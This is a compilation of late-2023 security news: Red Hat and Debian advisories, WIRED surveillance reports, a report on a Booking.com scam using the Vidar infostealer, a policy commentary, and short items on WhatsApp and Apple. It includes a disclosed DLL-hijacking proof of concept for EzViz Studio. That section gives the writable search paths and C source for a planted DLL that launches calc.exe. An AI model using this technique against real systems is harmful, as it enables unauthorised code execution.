Red Hat Security Advisory 2023-7667-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7667.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:12 security update  
Advisory ID:        RHSA-2023:7667-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7667  
Issue date:         2023-12-06  
Revision:           03  
CVE Names:          CVE-2022-2625  
====================================================================

Summary: 

An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes (CVE-2023-2454)

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Extension scripts replace objects not belonging to the extension. (CVE-2022-2625)

* postgresql: row security policies disregard user ID changes after inlining. (CVE-2023-2455)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Client memory disclosure when connecting with Kerberos to modified server (CVE-2022-41862)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-2625

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2113825  
https://bugzilla.redhat.com/show_bug.cgi?id=2165722  
https://bugzilla.redhat.com/show_bug.cgi?id=2207568  
https://bugzilla.redhat.com/show_bug.cgi?id=2207569  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7667-03

Red Hat Security Advisory 2023-7665-03 - An update for linux-firmware is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Issues addressed include an information leakage vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7665.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: linux-firmware security updateAdvisory ID:        RHSA-2023:7665-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7665Issue date:         2023-12-06Revision:           03CVE Names:          CVE-2023-20593====================================================================Summary: An update for linux-firmware is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The linux-firmware packages contain all of the firmware files that are required by various devices to operate.Security Fix(es):* hw: amd: Cross-Process Information Leak (CVE-2023-20593)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-20593References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2217845

Red Hat Security Advisory 2023-7665-03

Governments can access records related to push notifications from mobile apps by requesting that data from Apple and Google, according to details in court records and a US senator.

If you have push notifications turned on for sensitive apps, you may want to reconsider your settings.

The United States government and foreign law enforcement can demand Apple and Google share metadata associated with push notifications from apps on iOS and Android, according to a US senator and court records reviewed by WIRED. These notifications can reveal which apps a person uses, along with other information that may be pertinent to law enforcement investigations.

US Senator Ron Wyden, an Oregon Democrat, highlighted the government surveillance technique in a letter sent to the US Department of Justice (DOJ) today. Wyden is specifically asking the DOJ to allow Apple and Google to discuss government requests for push notification records with their users, which Wyden says the US government has required them to keep secret thus far.

“In the spring of 2022, my office received a tip that government agencies in foreign countries were demanding smartphone ‘push’ notification records from Google and Apple,” Wyden wrote in the letter, which was first reported by Reuters. “My staff have been investigating this tip for the past year, which included contacting Apple and Google. In response to that query, the companies told my staff that information about this practice is restricted from public release by the government.”

App developers deliver push notifications using Apple’s Push Notification Service on iOS or Google’s Firebase Cloud Messaging on Android. Each user of an app is assigned a “push token,” which is transferred between the app and the mobile operating system’s push notification service. Push tokens are not permanently assigned to a single user, and new tokens may be generated when a person reinstalls an app or switches to a new device.

To identify a person of interest and whom they may have been communicating with, law enforcement must first go to an app developer to obtain the relevant push token and then bring it to the operating system maker—Apple or Google—and request information on which account the token is associated with. This puts the tech giants in “a unique position to facilitate government surveillance of how users are using particular apps,” Wyden writes.

According to Wyden, the records that governments can obtain from Apple and Google include metadata that reveals which apps a person has used, when they’ve received notifications, and the phone associated with a particular Google or Apple account. The content of push notifications is not included in this information, but, for at least some apps, law enforcement could obtain information about the content of specific pushes through additional requests based on the information from the push tokens.

While Wyden’s letter says that governments outside the US have requested people’s push notification records, the Federal Bureau of Investigation (FBI) has done so as well. A February 2021 search warrant application submitted by an FBI agent to the US District Court in Washington, DC, requested details for two accounts controlled by Meta (then Facebook), specifically citing a request for push notification tokens. The search warrant request related to an investigation into a person accused of taking part in the January 6, 2021, attack on the US Capitol.

Meta, which owns Facebook, WhatsApp, and Instagram, did not immediately respond to WIRED’s request to comment. A spokesperson for Signal, the popular encrypted messaging app, also did not respond. The DOJ declined to comment.

Although Wyden is asking the DOJ to allow Apple and Google to discuss government requests for push notification records, the senator’s letter appears to have enabled them to do just that.

An Apple spokesperson tells WIRED that the company has updated its Law Enforcement Guidelines in its transparency report to reflect government requests for push notification records. The company will also begin to detail these requests in its next transparency report. Apple's updated rules for police requests say push notification records “may be obtained with a subpoena or greater legal process.”

“Apple is committed to transparency and we have long been a supporter of efforts to ensure that providers are able to disclose as much information as possible to their users,” Apple says in a statement. “In this case, the federal government prohibited us from sharing any information and now that this method has become public we are updating our transparency reporting to detail these kinds of requests.”

Google confirmed to WIRED that it receives requests for push notification records, but the company says it already includes these types of requests in its transparency reports. The company says requests from US-based law enforcement for push notification records require court orders with judicial approval.

“We were the first major company to publish a public transparency report sharing the number and types of government requests for user data we receive, including the requests referred to by Senator Wyden,” a Google spokesperson tells WIRED. “We share the senator’s commitment to keeping users informed about these requests.”

A WIRED review of Google’s most recent transparency report for the period between December 2019 and December 2022 found that it does not specifically break out government requests for push notification records, and Google confirmed that it aggregates this data in its transparency report.

Google’s transparency report shows that the US government requested Google Cloud Platform data from enterprise customers 175 times during the period, and of those, used a search warrant 13 times. It is unclear whether any of those requests for user data included push notification records—details that may, following Wyden’s letter, be revealed in the future.

_Additional reporting by William Turton and Dhruv Mehrotra._

_Updated at 1:30 pm ET, December 6, 2023, to note that the DOJ has declined to comment on Wyden's letter and to add additional details about Apple's updated rules for law enforcement regarding requests for push notification records._

_Updated at 3:50 pm ET, December 6, 2023, to add details about Google's legal requirement for law enforcement requests for push notification records._

Police Can Spy on Your iOS and Android Push Notifications

By Deeba Ahmed
Vidar infostealer is capable of stealing browsing data, including passwords, cryptocurrency wallet credentials, and other personal information.
This is a post from HackRead.com Read the original post: Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

The ‘How To’ guide for targeting Booking.com customers is being offered for sale on the dark web, as well as on underground cybercrime forums, including Russian-speaking platforms such as XSS.IS.

Cybersecurity firm Secureworks is alerting Booking.com customers to a recently identified scam wherein hotels’ Booking.com accounts are compromised to deceive users into divulging their payment details.

This fraudulent activity was detected in October 2023. Researchers have observed that cybercriminals successfully obtained access to hotel login credentials through the utilization of the **Vidar information stealer**.

While this tool is not commonly employed in such scams, in this instance, the Vidar infostealer is utilized to infiltrate the hotel’s Booking.com portal. This unauthorized access enables cybercriminals to peruse upcoming bookings and communicate directly with guests while posing as hotel staff.

Researchers from Secureworks Counter Threat Unit™ (CTU) suspect that this may be part of a broader campaign specifically aimed at targeting Booking.com users. The purloined data is presumed to be traded on underground marketplaces or forums, where it can command a higher price due to the increased potential for defrauding unsuspecting guests.

Characterizing it as a sophisticatedly crafted scam, researchers highlight that the hackers devised an email aimed at gaining the trust of **hotel employees**. The deceptive message purportedly originated from a former guest who reported losing their ID or other valuables, seeking assistance from the hotel staff to locate the items.

The subtlety of this approach meant the employee did not find it suspicious, especially since the email lacked attachments or dubious links, creating the illusion of a genuine request. Consequently, the employee responded and offered assistance.

However, a link within the email, allegedly containing a photo of the lost item, actually served to install the Vidar infostealer. Once activated, this malware illicitly acquires the hotel’s Booking.com login credentials, facilitating unauthorized access to guest reservation details.

The hook in this scam creates a sense of urgency for the guests. The attacker contacts those having reservations at the hotel through Booking.com. Guests receive urgent emails from the hotel demanding immediate payment confirmation to avoid booking cancellation. This doesn’t raise any suspicions.

Rather, it panics the guests, and they click on the provided link. According to Secureworks’ **report**, this leads them to a fake website designed to look like Booking.com, which was created to steal their payment data.

The scammers scam the guests by draining their accounts using the stolen payment data. Moreover, they sell Booking.com credentials on the **Dark Web** for up to $2,000.

The Booking.com phishing email and one of the forums selling Booking.com exploit (Screenshot credit: Secureworks)

Although Booking.com hasn’t been directly breached, the company is cooperating with impacted hotels to improve security and help affected customers. The company emphasized using machine learning to detect suspicious activity and advised hotels and customers to stay vigilant and never provide payment details without verifying the website.

“Due to the rigorous controls and the machine learning capabilities we employ, we can detect and block the overwhelming majority of suspicious activity before it impacts our partners or customers. We have also been sharing additional tips and updates with our partners about what they can do to protect themselves and their businesses, along with the latest information on malware and phishing so that they are as up-to-date as possible on the latest trends that we’re seeing.”

“It’s good to remember that no legitimate transaction will ever require a customer to provide their credit card details by phone, email, or text message (including WhatsApp)”, Booking.com stated.

This incident highlights the evolving tactics of cybercriminals and the importance of vigilance, even for seemingly harmless requests. Hotels should be especially cautious of suspicious emails and enable multi-factor authentication on Booking.com and other platforms to add an extra layer of security.

**Chris Hauk**, Consumer Privacy Advocate at Pixel Privacy, shared his comments with Hackread.com, stating that this scam is designed to target hotels with good reputations.

“This scam preys on hotels that offer good customer service, making the hotel employees believe that they are aiding a customer in retrieving a lost item. This is the first time I’ve heard of scammers taking that approach. The second step in the scam involves using a customer’s Booking.com information to convince the customer that they need to make a payment immediately.”

“Organizations like Booking.com need to work with their partners to ensure that all systems and applications are kept up to date to close security holes. Also, employee training to make them aware of how scammers work is also a must” Hauk added.

****_RELATED ARTICLES_****

1.  **The Benefits Of Blockchain In The Travel Industry**
2.  **Newly Surfaced ThirdEye Infostealer Targeting Windows Devices**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **Hotel reservation platform leaks user data from top online booking sites**
5.  **Hackers steal sensitive data from Japanese search engine for sex hotels**

Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

Legislation set to be introduced in Congress this week would extend Section 702 surveillance of people applying for green cards, asylum, and some visas—subjecting loved ones to similar intrusions.

Americans with family overseas who hope to visit the United States may soon face an increased risk of being surveilled by their own government.

Support in Congress is growing for intensified vetting procedures at the US border, which would see immigrants and foreign visitors subjected to the same levels of scrutiny as suspected terrorists and spies. A bill introduced last week by members of the Senate Intelligence Committee (SSCI) and forthcoming legislation from its House counterpart both aim to expand the use of a key foreign intelligence program—Section 702—for screening and vetting visitors to the US.

The House bill, which has yet to be introduced, would additionally target asylum seekers and those applying for nonimmigrant visas and green cards, according to a memo released by the House Intelligence Committee (HPSCI) last month.

In an interview with CBS on Sunday, US Representative Mike Turner, Republican from Ohio and HPSCI chair, said he had gained the support of his Democratic counterpart, Jim Himes, in advancing legislation that would include the enhanced vetting procedures.

The 702 program allows the government to force US companies to wiretap the communications of foreigners who are presumed to be overseas—even when they’re communicating with people inside the US. Billions of calls, texts, and emails are intercepted under the program and committed to a searchable database accessible by four US intelligence agencies, including the Central Intelligence Agency (CIA) and Federal Bureau of Investigation (FBI).

A warrant is not required to conduct searches of the database, and its targets need not be suspected threats to the country. While ostensibly for defense, the 702 program selects targets based on whether they’re expected to possess or receive “foreign intelligence information.” In May, the US State Department said the program was “essential to advancing and promoting US interests around the world,” citing its value as a diplomatic tool.

In a declassified report released this year, a presidential oversight board said the calls and messages of Americans intercepted under Section 702 are “highly personal and sensitive,” detailing exchanges between “loved ones, friends, medical providers, academic advisors, lawyers, or religious leaders.” These communications, according to the Privacy and Civil Liberties Oversight Board (PCLOB), a federal civil liberties watchdog, may provide “great insight into an individual’s whereabouts, both in a given moment and in patterns over time.”

Public knowledge of this surveillance, the board concluded, “can have a chilling effect on speech.”

The 702 program is slated to expire on January 1, 2024. Lawmakers in the House and Senate are rushing to find a solution that would enable the program to continue despite growing mistrust from lawmakers and the public following years of unauthorized use. Abuses of 702 data have included the targeting of racial justice protesters, political activists, and immigrants. Other misused searches of the database for information related to a sitting US congressperson, a US senator, and members of a local political party.

US intelligence community leaders say permitting the program to expire would significantly diminish the government’s ability to monitor and disrupt overseas threats, from terrorism and cyberattacks targeting US infrastructure to espionage and the black market sale of nuclear weapons. “Loss of this vital provision, or its reauthorization in a narrowed form, would raise profound risks,” FBI director Christopher Wray said in a statement this fall.

The wealth of data collected under the 702 program is imponderable. US intelligence agencies have repeatedly claimed there are no means by which to calculate how often Americans are wiretapped without violating procedures intended to keep the program constitutional. The PCLOB report published earlier this year says simply that the collection of domestic communications “should not be understood as occurring infrequently.”

Civil rights experts argue that expanding the program to include routine vetting of people entering the United States would almost certainly be an encumbrance on immigration and asylum systems that US politicians readily acknowledge are broken. There are currently more than 2 million cases pending in US immigration courts, with the average case taking more than four years to adjudicate.

“Some noncitizens—including children and families—wait years to have their cases heard. The delays postpone decisions for vulnerable populations who may be eligible for protections, such as asylum. They also prolong the removal from the US of those who do not have valid claims to remain,” the US Government Accountability Office reported in October.

The vetting proposal, now formally endorsed by both intelligence committees in Congress, has ignited a firestorm among immigrants’ rights groups and nonprofits combating racism against Asian American and Pacific Islander (AAPI) communities. The groups say that, due to their international ties, immigrants naturally face an increased risk of having their communications swept up by the 702 program.

Kia Hamadanchy, senior policy counsel at the American Civil Liberties Union (ACLU), says the Section 702 program “invariably” intercepts communications between foreigners and their American family members. Using the program for vetting purposes means committing to “entirely suspicionless searches” of both, he says.

Andy Wong, a director of advocacy at Stop AAPI Hate, a coalition of community-based groups, has called out Democrats specifically for supporting the move, labeling it a “betrayal” of the Latino and Asian American communities. “We need leaders who dismantle systemic racism,” Wong says, “not entrench policies that leave us more exposed, separated, and vulnerable.”

“The government should be seeking to streamline the immigration process, including the family-based immigration system, not expand warrantless surveillance for individuals seeking to come to the United States,” says Joanna YangQing Derman, program director at the nonprofit Asian Americans Advancing Justice (AAJC). "Expanding warrantless surveillance to specifically go after immigrant communities would not only be harmful, but it would also be a deeply disappointing continuation of this country’s unfair treatment of Asian Americans and Asian immigrants.”

Representative Turner, the HPSCI chair, said Sunday on _Face the Nation_ that his committee had a bill to extend the 702 program endorsed by, among others, Representative Jim Himes, the committee’s ranking Democrat. Turner accused lawmakers not onboard with his bill of misunderstanding how the program works and its “value and importance” to “national security.”

ACLU’s Hamadanchy tells WIRED that it would be concerning to see Himes and other Democrats endorsing use of the program against immigrant communities. “It would represent a dramatic expansion of the current vetting practices,” he says, “and it would be disappointing if it is something Congressman Himes has signed on to.”

Himes did not immediately respond to a request for comment.

Turner said Sunday that he’d already gained the support of the SSCI chair, Senator Mike Warner (D-Virginia), who introduced his own 702 bill last week. Warner’s bill also includes language that expands the 702 program to “enable the vetting of non-United States persons who are being processed for travel to the United States,” but does not mention visas or green cards.

Elizabeth Goitein, senior director of the Brennan Center for Justice’s liberty & national security program, calls Warner’s proposals unnecessary. “There are already plenty of vetting mechanisms in place to ensure that visitors to this country don’t pose a threat to national security or public safety,” she says.

“People should be able to vacation, work, or study in the United States without opening up their private communications to US government scrutiny,” Goitein adds.

Although the text of his bill is not public, much is already known about Turner’s aims. Last month, the HPSCI released an outline of its proposals describing, among other so-called reforms, an amendment that would allow the government to search the 702 database “for the purpose of screening and vetting immigration and non-immigrant visa applicants.”

According to Goitein, the HPSCI proposal would likely impact millions of people living lawfully in the United States, including those with work permits and student visas. “The notion that immigrants give up their privacy rights when they come to this country is wrong and repugnant,” she says.

Senior congressional sources tell WIRED that the HPSCI bill may surface as early as this week. It will compete against another bipartisan bill introduced in the House Judiciary Committee (HJC), chaired by Representative Jim Jordan (R-Ohio), a prominent critic of domestic surveillance abuse.

The contrast between the two House bills is likely to be drastic, with Jordan having previously endorsed an array of privacy reforms, including those aimed at requiring the FBI to obtain a warrant before accessing Americans’ communications amassed by the 702 program—a limitation that is strictly opposed by the heads of the two intelligence committees.

Neither Warner nor Turner immediately responded to inquiries from WIRED on Monday.

Mystery surrounds which bill Representative Mike Johnson (R-Louisiana), the new House speaker, will inevitably endorse. But the HJC traditionally faces stiff opposition from House leaders when pursuing surveillance reform. Republican and Democratic leaders alike have historically shown deference to the appeals of the intelligence community for sustaining and enhancing its authority.

Johnson, meanwhile, is rumored to have held war room discussions last month about extending the Section 702 program by amending must-pass legislation, such as the National Defense Authorization Act—which, despite being months late already, has yet to materialize.

Johnson has not responded to repeated requests for comment from WIRED regarding his thoughts on the 702 program.

_Updated at 10:45 am ET, December 4, 2023, with comment from Joanna YangQing Derman of AAJC._

US Lawmakers Want to Use a Powerful Spy Tool on Immigrants and Their Families

EzViz Studio v2.2.0 is vulnerable to DLL hijacking.

PoC:

*DLL Hijacking via EzViz Studio (Reported by EAFZ from Pythongoras)*

*Author: EAFZ aka myantti3m*

*CVE: **CVE**-2023-41613.*

*Test Environment:*

OS: Windows 11 Pro 64 bit(10.0,  Build 2261)

EzViz Studio version: 2.2.0

*Technical Description *

*1.  **Technical Description *

EzvizStudio.exe searches for a DLL called TcApi.dll. Because TcApi.dll  
doesn’t exist in any of the paths of the DLL search order. In particular,  
some paths have writable permissions for normal users as:

·         C:\Users\<Username>\AppData\Local\Programs\Microsoft VS  
Code\bin\TcApi.dll

·         C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

So we can plant “malicious” TcApi.dll inside these directories and wait  
until the application will load it.

*POC*

We created a malicious DLL file (TcApi.dll) and complied it. In our case,  
it opens calc.exe. You can see the code below:

#include <windows.h>

#pragma comment (lib, "user32.lib")

#include "pch.h"

#include <iostream>

#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule,

       DWORD nReason, LPVOID lpReserved) {

       switch (nReason) {

       case DLL_PROCESS_ATTACH:

              system("calc.exe");

              break;

       case DLL_PROCESS_DETACH:

              break;

       case DLL_THREAD_ATTACH:

              break;

       case DLL_THREAD_DETACH:

              break;

       }

       return TRUE;

}

Copy “malicious” TcApi.dll to

C:\Users\<Username>\AppData\Local\Microsoft\WindowsApps\TcApi.dll

If we run the EzVizStudio again, the code from the “malicious” DLL runs

CVE-2023-41613: EzViz Studio 2.2.0 DLL Hijacking ≈ Packet Storm

A more proactive approach to fighting cyberattacks for US companies and agencies is shaping up under the CISA's proposal to emphasize real-time attack detection and response.

Source: Wavebreakmedia Ltd IFE-210813 via Alamy Stock Photo

COMMENTARY

The United States faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies.

These attacks can have severe consequences, from the theft of sensitive information to the disruption of essential services. To effectively combat these threats, the US needs to adopt a comprehensive and proactive approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate.

Where are we now, and are we on the right track to adopt a similar mandate on this side of the Atlantic?

**The IT-SiG Approach Compared With the US's Current Capabilities**

One of the key features of the IT-SiG 2.0 mandate is its emphasis on real-time attack detection and response. This approach recognizes that preventing all cyberattacks is impossible and focuses on quickly identifying and mitigating the effects of successful attacks. This mitigation is achieved through advanced security technologies, such as intrusion-detection systems, security information and event management (SIEM) systems, and security orchestration, automation, and response (SOAR) systems, which can detect and respond to potential threats in near real time.

In contrast, the US has traditionally relied on patching vulnerabilities and responding to attacks after they have occurred and, ideally, been resolved. While this approach can effectively mitigate the effects of individual attacks, more is needed to keep pace with the rapidly evolving cyber-threat landscape. The US has needed a more proactive approach, like the IT-SiG 2.0 mandate, emphasizing real-time attack detection and response to stay ahead of potential threats.

**With This Strategy, Visibility Is Key**

Another critical aspect of the IT-SiG 2.0 mandate is its focus on improving visibility into the cybersecurity posture of organizations. Visibility is achieved through regular security assessments and penetration testing, which help identify vulnerabilities and weaknesses in an organization's systems and networks. By comprehensively understanding an organization's cybersecurity posture, the IT-SiG 2.0 mandate encourages organizations to identify issues and take steps to remediate them, improving overall security.

The United States has taken steps toward improving visibility into the cybersecurity posture of federal agencies with the Cybersecurity & Infrastructure Security Agency's Binding Operational Directive 23-01 in October 2022. However, this directive only applies to federal agencies and not to private-sector companies; many organizations may not have the same level of visibility into their cybersecurity posture as federal agencies.

According to Statista's Research Department, in the fiscal year 2020 the number of cybersecurity incident reports by federal agencies in the United States was over 30,000, around an 8% increase from the previous year.

To effectively combat cyber threats, it's essential that all organizations, not just federal agencies, have the necessary visibility into their cybersecurity posture. Therefore, the US should consider expanding the reach of Directive 23-01, like the IT-SiG 2.0 mandate, to include private-sector companies. This expansion would ensure that all organizations have visibility into their cybersecurity protection.

**Recent US Steps**

In brighter news, we might be beginning on the path toward a more effective national cybersecurity strategy akin to IT-SiG 2.0. In March, the Biden administration announced its National Cybersecurity Strategy. Among the plan's emphases are defending critical infrastructure; disrupting the ability for cybercriminals to attack agencies, organizations, and individuals; encouraging market forces to lead the way to broader security and resilience; and fostering international collaboration between private and public sectors to stay ahead of bad actors.

It appears the plan emphasizes less the cybersecurity tools that will be used and more the means of making sure they're being adopted and used correctly, shoring up weak links in complex business and government affairs. While the White House laid out this plan, a significant amount of the burden will fall on the shoulders of those most capable of fighting back against waves of cyberthreats — namely, the business world alongside the government. A redefinition of the "social contract" of cybersecurity seems to be what they're after here, with smaller businesses and individuals able to benefit from the processes put in place by larger organizations.

Taking up this plan and running with it, in August the Cybersecurity & Infrastructure Security Agency (CISA) released its Cybersecurity Strategic Plan for the fiscal years 2024 through 2026. "It's up to all of us, government and private sector, domestic and international, to execute \[the cybersecurity plan\]," Eric Goldstein, Executive Assistant Director for Cybersecurity wrote on the CISA website.

How does CISA's plan compare with IT-SiG 2.0? If we're going by real-time attack detection and visibility as the main driving points, then CISA's plan directly lines up, at least in concept. CISA's plan outlines three major goals: address immediate threats, harden the terrain, and drive security at scale.

So, visibility into vulnerabilities, quick real-time responses, and proactive mitigation of weaknesses that could be exploited are the primary focus. While this is still in plan form, it does seem like CISA has homed in on the same key points the IT-SiG 2.0 is going after.

**Looking Toward a More Secure Future**

Statista's Research Department found that in the first half of 2022, the number of data compromises in the US came in at 817 cases. Over 53 million individuals were affected by those data compromises, which included data breaches, data leakage, and data exposure.

The US faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies. To effectively combat these threats, the United States needs to adopt a comprehensive and mandated approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate. This approach forces real-time attack detection and response, improves visibility into organizations' cybersecurity approach, and offers a solid beginning to a more secure digital world.

There's work to be done — by both government agencies and businesses, as the shift in the social contract implores everyone to do what they can — but by taking these first steps, the United States can improve its overall cybersecurity posture for all companies and better protect digital assets against potential threats.

**About the Author(s)**

CTO & Co-Founder, SecurityBridge

Ivan Mans is a long time SAP technology consultant, having worked in the SAP space since 1997 — the early days of R/3. In 2012, Ivan co-founded SecurityBridge, and in his current role as CTO, he is a motivated driver, inspires people, and pushes technology that contributes to the continuous innovation of the SecurityBridge Platform. In recent years, Ivan has been a regular speaker at SAP events, evangelizing SAP security.

The US Needs to Follow Germany's Attack-Detection Mandate

Debian Linux Security Advisory 5569-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5569-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 30, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-6345 CVE-2023-6346 CVE-2023-6347 CVE-2023-6348                  CVE-2023-6350 CVE-2023-6351Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 119.0.6045.199-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 119.0.6045.199-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVouqQACgkQZF0CR8Nudjdmtg//WecYaNpTK78jbWWKXpBZaX5w5XN4gbYH5ky4g1uuyi/ux2U17ynh0b0Q50j5iX4g3obOch8BwNxLDIvsjNoWL30LU6DeiDVBfOP+w+sjMQLUDwI0YU6jW2kYyLnrOUUYEECEE7lIEnMogxVN/o4JESfleShgEgAlDayHfuL4BxwgiqsIM8PZgCVSCtrDamNBbLE7X9FXHPb32mcqUXYh5WoSIPjgo45pOWlUCSizMXBQ47BCm8iuQq38TCIscfvZhjwF7bWrP8NHRimFd1RnQtbQpLsKufJBllnHby7mM1U2+jUq8GIKHpFy2jTQ6q42x5P65H0q6MxOelDkAmdMMOBt68vVgvZ8zIgmpb5/RoIzZNtioPUkpmzFal5/vHTbE1dmIuylffnPOoM4wF16xG6Fs61HuhRWZscrBCflkIuL3UF7Y3rdIyGdyV7Unm2X8fkhVJ00PKg+qC2E73udBYFfTDlvrh8uHf68x12OrmOuNkd6JdNocCnW/se9wVFqLjtyzew//aXC2D3STuyfGMgt9LnGWJDqJx7Lbr+Fp1BCPYPNkinobkjEKKyvx9unR8tM14K16Pf+84xSX/FKpQagcSZ/koqeUjyJ0QpNUC1IuOMrRNgmW6PspLehwd3WExRnclzCsKuE7oNtla8Rjsap3bOGrfBOVeqYA1FjieI==Qn+X-----END PGP SIGNATURE-----

Debian Security Advisory 5569-1

Meta-owned WhatsApp has launched a new Secret Code feature to help users protect sensitive conversations with a custom password on the messaging platform.
The feature has been described as an "additional way to protect those chats and make them harder to find if someone has access to your phone or you share a phone with someone else."
Secret Code builds on another feature

Privacy / Data Protection

Meta-owned WhatsApp has launched a new **Secret Code** feature to help users protect sensitive conversations with a custom password on the messaging platform.

The feature has been described as an "additional way to protect those chats and make them harder to find if someone has access to your phone or you share a phone with someone else."

Secret Code builds on another feature called Chat Lock that WhatsApp announced in May, which moves chats to a separate folder of their own such that they can be accessed only upon providing their device password or biometrics.

By setting a unique password for these locked chats that are different from the password used to unlock the phone, the aim is to give users an additional layer of privacy, WhatsApp noted.

"You'll have the option to hide the Locked Chats folder from your chatlist so that they can only be discovered by typing your secret code in the search bar," it added.

The development comes weeks after WhatsApp introduced a "Protect IP Address in Calls" feature that masks users' IP addresses to other parties by relaying the calls through its servers.

It also follows calls by the French government urging ministers, secretaries of state, and cabinet members to refrain from using popular messaging apps like WhatsApp, Signal, and Telegram in favor of homegrown alternatives like Tchap (based on the Matrix protocol) and Olvid by December 8, 2023.

The news, which was first reported by Le Point, cited a circulated document that claimed: "these digital tools are not devoid of security vulnerabilities and therefore do not ensure the security of conversations and information shared through them."

In response, Meredith Whittaker, president of Signal, hit back at the French government's decision, stating, "this claim is not backed by any evidence, and is dangerously misleading esp. coming from gov." Will Cathcart, the head of WhatsApp, concurred, saying, "we are of the same opinion."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

WhatsApp's New Secret Code Feature Lets Users Protect Private Chats with Password

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.
The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

CVE-2023-42916 - An out-of-bounds read issue that could be exploited to

Spyware / Threat Analysis

Apple has released software updates for iOS, iPadOS, macOS, and Safari web browser to address two security flaws that it said have come under active exploitation in the wild on older versions of its software.

The vulnerabilities, both of which reside in the WebKit web browser engine, are described below -

*   **CVE-2023-42916** - An out-of-bounds read issue that could be exploited to leak sensitive information when processing web content.
*   **CVE-2023-42917** - A memory corruption bug that could result in arbitrary code execution when processing web content.

Apple said it's aware of reports exploiting the shortcomings "against versions of iOS before iOS 16.7.1," which was released on October 10, 2023. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the twin flaws.

The iPhone maker did not provide additional information regarding ongoing exploitation, but previously disclosed zero-days in iOS have been used to deliver mercenary spyware targeting high-risk individuals, such as activists, dissidents, journalists, and politicians.

